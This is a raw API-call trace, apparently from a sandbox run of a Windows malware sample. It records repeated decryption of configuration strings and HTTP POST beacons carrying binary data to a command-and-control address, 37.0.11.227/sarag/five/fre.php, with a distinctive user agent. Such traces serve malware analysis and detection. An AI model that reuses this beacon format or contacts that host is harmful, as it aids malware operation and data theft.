[0203.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0203.035] GetProcessHeap () returned 0x690000 [0203.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.036] GetProcessHeap () returned 0x690000 [0203.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0203.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.037] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.042] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0203.057] GetProcessHeap () returned 0x690000 [0203.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0203.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.059] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.061] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.062] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.062] GetProcessHeap () returned 0x690000 [0203.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0203.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.063] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0203.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.064] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.065] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0203.065] GetProcessHeap () returned 0x690000 [0203.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0203.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.066] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0203.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.067] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0203.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.069] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0203.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.070] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0203.070] GetProcessHeap () returned 0x690000 [0203.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0203.070] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3678*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0203.070] GetProcessHeap () returned 0x690000 [0203.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0203.070] socket (af=2, type=1, protocol=6) returned 0x458 [0203.070] connect (s=0x458, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0203.101] FreeAddrInfoW (pAddrInfo=0x6b3678*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0203.101] GetProcessHeap () returned 0x690000 [0203.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0203.101] GetProcessHeap () returned 0x690000 [0203.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b37c0 [0203.102] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.103] wvsprintfA (in: param_1=0x6b37c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0203.103] GetProcessHeap () returned 0x690000 [0203.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0203.103] GetProcessHeap () returned 0x690000 [0203.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.103] GetProcessHeap () returned 0x690000 [0203.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0203.104] GetProcessHeap () returned 0x690000 [0203.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b37c0 [0203.104] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.105] wvsprintfA (in: param_1=0x6b37c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0203.105] GetProcessHeap () returned 0x690000 [0203.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0203.105] GetProcessHeap () returned 0x690000 [0203.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.106] send (s=0x458, buf=0x6abd08*, len=242, flags=0) returned 242 [0203.106] send (s=0x458, buf=0x6aba40*, len=159, flags=0) returned 159 [0203.106] GetProcessHeap () returned 0x690000 [0203.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b37c0 [0203.106] recv (in: s=0x458, buf=0x6b37c0, len=4048, flags=0 | out: buf=0x6b37c0*) returned 204 [0203.192] GetProcessHeap () returned 0x690000 [0203.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0203.192] GetProcessHeap () returned 0x690000 [0203.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.193] GetProcessHeap () returned 0x690000 [0203.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0203.193] GetProcessHeap () returned 0x690000 [0203.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0203.194] closesocket (s=0x458) returned 0 [0203.194] GetProcessHeap () returned 0x690000 [0203.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0203.194] GetProcessHeap () returned 0x690000 [0203.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0203.195] GetProcessHeap () returned 0x690000 [0203.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0203.195] GetProcessHeap () returned 0x690000 [0203.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0203.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b37c0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x368) returned 0x458 [0203.197] Sleep (dwMilliseconds=0xea60) [0203.198] GetProcessHeap () returned 0x690000 [0203.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0203.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.199] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.206] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0203.212] GetProcessHeap () returned 0x690000 [0203.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0203.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.213] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.214] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.216] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.216] GetProcessHeap () returned 0x690000 [0203.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0203.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.218] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0203.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.219] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.220] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0203.220] GetProcessHeap () returned 0x690000 [0203.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0203.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.220] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.221] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.222] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.223] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.223] GetProcessHeap () returned 0x690000 [0203.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0203.223] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.223] GetProcessHeap () returned 0x690000 [0203.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0203.224] GetProcessHeap () returned 0x690000 [0203.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0203.224] GetProcessHeap () returned 0x690000 [0203.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.226] GetProcessHeap () returned 0x690000 [0203.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0203.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.227] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0203.237] GetProcessHeap () returned 0x690000 [0203.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0203.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.238] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.239] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.240] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.240] GetProcessHeap () returned 0x690000 [0203.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0203.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.241] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0203.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.242] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.243] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0203.243] GetProcessHeap () returned 0x690000 [0203.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0203.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.244] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0203.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.245] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0203.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.246] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0203.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.247] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0203.247] GetProcessHeap () returned 0x690000 [0203.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0203.247] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adce8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0203.248] GetProcessHeap () returned 0x690000 [0203.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0203.249] socket (af=2, type=1, protocol=6) returned 0x45c [0203.249] connect (s=0x45c, name=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0203.271] FreeAddrInfoW (pAddrInfo=0x6adce8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0203.271] GetProcessHeap () returned 0x690000 [0203.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0203.271] GetProcessHeap () returned 0x690000 [0203.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b37c0 [0203.272] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.273] wvsprintfA (in: param_1=0x6b37c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0203.273] GetProcessHeap () returned 0x690000 [0203.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0203.273] GetProcessHeap () returned 0x690000 [0203.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.273] GetProcessHeap () returned 0x690000 [0203.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0203.273] GetProcessHeap () returned 0x690000 [0203.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b37c0 [0203.274] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.275] wvsprintfA (in: param_1=0x6b37c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0203.275] GetProcessHeap () returned 0x690000 [0203.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0203.275] GetProcessHeap () returned 0x690000 [0203.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.275] send (s=0x45c, buf=0x6a91a8*, len=242, flags=0) returned 242 [0203.275] send (s=0x45c, buf=0x6aba40*, len=159, flags=0) returned 159 [0203.275] GetProcessHeap () returned 0x690000 [0203.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b37c0 [0203.275] recv (in: s=0x45c, buf=0x6b37c0, len=4048, flags=0 | out: buf=0x6b37c0*) returned 204 [0203.354] GetProcessHeap () returned 0x690000 [0203.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0203.354] GetProcessHeap () returned 0x690000 [0203.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0203.355] GetProcessHeap () returned 0x690000 [0203.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0203.356] GetProcessHeap () returned 0x690000 [0203.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0203.356] closesocket (s=0x45c) returned 0 [0203.357] GetProcessHeap () returned 0x690000 [0203.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0203.357] GetProcessHeap () returned 0x690000 [0203.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0203.357] GetProcessHeap () returned 0x690000 [0203.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.358] GetProcessHeap () returned 0x690000 [0203.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0203.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b37c0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8ac) returned 0x45c [0203.360] Sleep (dwMilliseconds=0xea60) [0203.361] GetProcessHeap () returned 0x690000 [0203.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0203.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.362] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.367] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0203.373] GetProcessHeap () returned 0x690000 [0203.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0203.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.376] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.377] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.379] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.379] GetProcessHeap () returned 0x690000 [0203.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0203.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.381] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0203.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.382] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.383] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0203.383] GetProcessHeap () returned 0x690000 [0203.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0203.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.391] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.392] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.393] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.394] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.394] GetProcessHeap () returned 0x690000 [0203.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0203.394] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.394] GetProcessHeap () returned 0x690000 [0203.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0203.409] GetProcessHeap () returned 0x690000 [0203.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0203.409] GetProcessHeap () returned 0x690000 [0203.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0203.410] GetProcessHeap () returned 0x690000 [0203.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0203.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.411] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.419] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0203.425] GetProcessHeap () returned 0x690000 [0203.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0203.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.426] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 